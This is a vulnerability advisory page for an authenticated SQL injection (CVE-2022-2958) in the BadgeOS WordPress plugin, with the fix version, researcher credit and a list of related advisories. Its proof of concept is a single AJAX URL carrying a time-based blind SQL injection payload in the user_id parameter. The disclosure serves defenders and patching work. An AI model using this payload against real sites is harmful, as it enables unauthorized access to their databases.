BadgeOS < 3.7.1.3 – Subscriber+ SQLi | CVE 2022-2958 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape parameters before using them in SQL statements via AJAX actions available to any authenticated users, leading to SQL Injections

Proof of Concept

Open the following URL as any authenticated user (such as subscriber): https://example.com/wp-admin/admin-ajax.php?action=get-achievements&total_only=true&user_id=11%20AND%20(SELECT%209628%20FROM%20(SELECT(SLEEP(5)))WOrh)--%20KUsb

Affects Plugins

Fixed in 3.7.1.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

8743534f-8ebd-496a-99bc-5052a8bac86a

Timeline

Publicly Published

2022-08-23 (about 1 years ago)

Added

2022-08-23 (about 1 years ago)

Last Updated

2023-05-13 (about 1 years ago)

Other

Published

Title

Published

2021-11-15

Title

Mediamatic < 2.8.1 - Subscriber+ SQL Injection

Published

2017-05-31

Title

eventr 1.02.2 - Blind SQL Injection

Published

2021-04-05

Title

Simple Membership < 4.0.4 - Authenticated SQL Injections

Published

2024-03-26

Title

Calendarista < 15.5.9 - Authenticated (Subscriber+) SQL Injection

Published

2014-09-19

Title

YAWPP < 1.2.2 - SQL Injection